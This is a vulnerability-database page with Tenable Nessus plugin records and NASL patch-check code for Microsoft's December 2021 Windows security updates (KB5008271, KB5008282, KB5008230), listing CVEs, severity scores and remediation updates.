KB5008271: Windows Server 2008 Security Update (December 2021)

2021-12-14T00:00:00

Description

The remote Windows host is missing security update 5008271 or cumulative update 5008274. It is, therefore, affected by multiple vulnerabilities: - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-41333, CVE-2021-43207, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43238, CVE-2021-43883, CVE-2021-43893) - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43236) - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43234)

{"id": "SMB_NT_MS21_DEC_5008271.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "KB5008271: Windows Server 2008 Security Update (December 2021)", "description": "The remote Windows host is missing security update 5008271 or cumulative update 5008274. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43238, CVE-2021-43883, CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43236)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43234)", "published": "2021-12-14T00:00:00", "modified": "2022-01-14T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/156067", "reporter": "This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43238", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43224", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43207", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43215", "https://support.microsoft.com/en-us/help/5008271", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43222", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43226", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43229", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43230", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43883", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43893", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43217", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43234", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43216", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43236"], "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43883", "CVE-2021-43893"], "immutableFields": [], "lastseen": "2023-05-18T15:36:16", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:1196BAF9-A467-480D-A40C-F3E93D5888D6", "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "avleonov", "idList": ["AVLEONOV:B6F052DA6F44A6D3C449552BB1B53A9A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0921", "CPAI-2021-0922", "CPAI-2021-0926", "CPAI-2021-0938"]}, {"type": "cnvd", "idList": ["CNVD-2021-101712", "CNVD-2021-101714"]}, {"type": "cve", "idList": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43883", "CVE-2021-43893"]}, {"type": "githubexploit", "idList": ["3F3E7B37-A718-509B-BDC5-A78248C7D538", "BCFEE285-529F-5A1A-95A0-0775ED804D32", "DF9C9272-7F4D-5362-A6BF-18A60A5E907D"]}, {"type": "kaspersky", "idList": ["KLA12387", "KLA12388"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:814AB3EE714524998329C30E8008B730"]}, {"type": "mscve", "idList": ["MS:CVE-2021-41333", "MS:CVE-2021-43207", "MS:CVE-2021-43215", "MS:CVE-2021-43216", "MS:CVE-2021-43217", "MS:CVE-2021-43222", "MS:CVE-2021-43224", "MS:CVE-2021-43226", "MS:CVE-2021-43229", "MS:CVE-2021-43230", "MS:CVE-2021-43231", "MS:CVE-2021-43234", "MS:CVE-2021-43236", "MS:CVE-2021-43238", "MS:CVE-2021-43883", "MS:CVE-2021-43893"]}, {"type": "mskb", "idList": ["KB5008206", "KB5008207", "KB5008212", "KB5008215", "KB5008218", "KB5008223", "KB5008230", "KB5008244", "KB5008255", "KB5008263", "KB5008271", "KB5008274", "KB5008277", "KB5008282", "KB5008285"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_DEC_5008206.NASL", "SMB_NT_MS21_DEC_5008207.NASL", "SMB_NT_MS21_DEC_5008212.NASL", "SMB_NT_MS21_DEC_5008215.NASL", "SMB_NT_MS21_DEC_5008218.NASL", "SMB_NT_MS21_DEC_5008223.NASL", "SMB_NT_MS21_DEC_5008230.NASL", "SMB_NT_MS21_DEC_5008255.NASL", "SMB_NT_MS21_DEC_5008282.NASL", "SMB_NT_MS21_DEC_5008285.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:02535C1172C0E3693DB4E76BB1CCA660"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0305BCDA9DE47FE4223986163B0EA7C4", "RAPID7BLOG:3889507E1F7928BBDF65D055DA138C77", "RAPID7BLOG:5E98567442ADCB32BB59B8024706BABB", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1"]}, {"type": "thn", "idList": ["THN:A12549603E494D035DF4BABEC04EBD5D"]}, {"type": "threatpost", "idList": ["THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80"]}, {"type": "zdi", "idList": ["ZDI-21-1552", "ZDI-22-019"]}]}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:1196BAF9-A467-480D-A40C-F3E93D5888D6"]}, {"type": "avleonov", "idList": ["AVLEONOV:B6F052DA6F44A6D3C449552BB1B53A9A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0921", "CPAI-2021-0922", "CPAI-2021-0926", "CPAI-2021-0938"]}, {"type": "cve", "idList": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43883", "CVE-2021-43893"]}, {"type": "githubexploit", "idList": ["BCFEE285-529F-5A1A-95A0-0775ED804D32", "DF9C9272-7F4D-5362-A6BF-18A60A5E907D"]}, {"type": "kaspersky", "idList": ["KLA12387", "KLA12388"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:814AB3EE714524998329C30E8008B730"]}, {"type": "mscve", "idList": ["MS:CVE-2021-41333", "MS:CVE-2021-43207", "MS:CVE-2021-43215", "MS:CVE-2021-43216", "MS:CVE-2021-43217", "MS:CVE-2021-43222", "MS:CVE-2021-43224", "MS:CVE-2021-43226", "MS:CVE-2021-43229", "MS:CVE-2021-43230", "MS:CVE-2021-43234", "MS:CVE-2021-43236", "MS:CVE-2021-43238", "MS:CVE-2021-43883", "MS:CVE-2021-43893"]}, {"type": "mskb", "idList": ["KB5008212", "KB5008215", "KB5008218", "KB5008223", "KB5008230", "KB5008271", "KB5008285"]}, {"type": "nessus", "idList": ["SMB_HOTFIXES.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:02535C1172C0E3693DB4E76BB1CCA660"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44"]}, {"type": "thn", "idList": ["THN:A12549603E494D035DF4BABEC04EBD5D"]}, {"type": "threatpost", "idList": ["THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80"]}, {"type": "zdi", "idList": ["ZDI-21-1552"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-41333", "epss": 0.00046, "percentile": 0.12874, "modified": "2023-05-02"}, {"cve": "CVE-2021-43207", "epss": 0.00043, "percentile": 0.07454, "modified": "2023-05-02"}, {"cve": "CVE-2021-43215", "epss": 0.01652, "percentile": 0.85716, "modified": "2023-05-02"}, {"cve": "CVE-2021-43216", "epss": 0.00989, "percentile": 0.81302, "modified": "2023-05-02"}, {"cve": "CVE-2021-43217", "epss": 0.01093, "percentile": 0.82261, "modified": "2023-05-02"}, {"cve": "CVE-2021-43222", "epss": 0.04073, "percentile": 0.90821, "modified": "2023-05-02"}, {"cve": "CVE-2021-43224", "epss": 0.00051, "percentile": 0.17971, "modified": "2023-05-02"}, {"cve": "CVE-2021-43226", "epss": 0.00043, "percentile": 0.07454, "modified": "2023-05-02"}, {"cve": "CVE-2021-43229", "epss": 0.00043, "percentile": 0.07454, "modified": "2023-05-02"}, {"cve": "CVE-2021-43230", "epss": 0.00043, "percentile": 0.07454, "modified": "2023-05-02"}, {"cve": "CVE-2021-43234", "epss": 0.00118, "percentile": 0.44374, "modified": "2023-05-02"}, {"cve": "CVE-2021-43236", "epss": 0.00266, "percentile": 0.62709, "modified": "2023-05-02"}, {"cve": "CVE-2021-43238", "epss": 0.00046, "percentile": 0.12874, "modified": "2023-05-02"}, {"cve": "CVE-2021-43883", "epss": 0.00043, "percentile": 0.07454, "modified": "2023-05-02"}, {"cve": "CVE-2021-43893", "epss": 0.00223, "percentile": 0.59127, "modified": "2023-05-02"}], "vulnersScore": 0.7}, "_state": {"dependencies": 1684454767, "score": 1684424289, "epss": 0}, "_internal": {"score_hash": "b23a0853cfcc5e4054c11415cd74fed8"}, "pluginID": "156067", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156067);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43222\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43234\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008271\");\n script_xref(name:\"MSKB\", value:\"5008274\");\n script_xref(name:\"MSFT\", value:\"MS21-5008271\");\n script_xref(name:\"MSFT\", value:\"MS21-5008274\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008271: Windows Server 2008 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008271\nor cumulative update 5008274. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43226,\n CVE-2021-43229, CVE-2021-43230, CVE-2021-43238,\n CVE-2021-43883, CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43236)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43234)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008271\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5008271 or Cumulative Update KB5008274.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008271', '5008274');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008271,5008274])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Apply Security Only update KB5008271 or Cumulative Update KB5008274.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-43217", "vendor_cvss2": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-12-14T00:00:00", "vulnerabilityPublicationDate": "2021-12-14T00:00:00", "exploitableWith": []}

{"nessus": [{"lastseen": "2023-05-18T15:36:11", "description": "The remote Windows host is missing security update 5008282 or cumulative update 5008244. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-40441, CVE-2021-41333, CVE-2021-43207, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43238, CVE-2021-43245, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43236)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008282: Windows 7 and Windows Server 2008 R2 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40441", "CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43245", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008282.NASL", "href": "https://www.tenable.com/plugins/nessus/156069", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156069);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2021-40441\",\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43245\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSFT\", value:\"MS21-5008244\");\n script_xref(name:\"MSFT\", value:\"MS21-5008282\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008282: Windows 7 and Windows Server 2008 R2 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008282\nor cumulative update 5008244. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-40441, CVE-2021-41333, CVE-2021-43207,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43238, CVE-2021-43245, CVE-2021-43883,\n CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43236)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5008282 or Cumulative Update KB5008244.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-12';\nkbs = make_list(\n '5008282',\n '5008244'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008282, 5008244])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:27", "description": "The remote Windows host is missing security update 5008230. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43238, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008230: Windows 10 version 1507 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008230.NASL", "href": "https://www.tenable.com/plugins/nessus/156070", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156070);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/14\");\n\n script_cve_id(\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43238\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008230\");\n script_xref(name:\"MSFT\", value:\"MS21-5008230\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n\n script_name(english:\"KB5008230: Windows 10 version 1507 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008230. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, \n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, \n CVE-2021-43238, CVE-2021-43248, CVE-2021-43883, \n CVE-2021-43893)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5008230\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-12';\nkbs = make_list(\n '5008230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 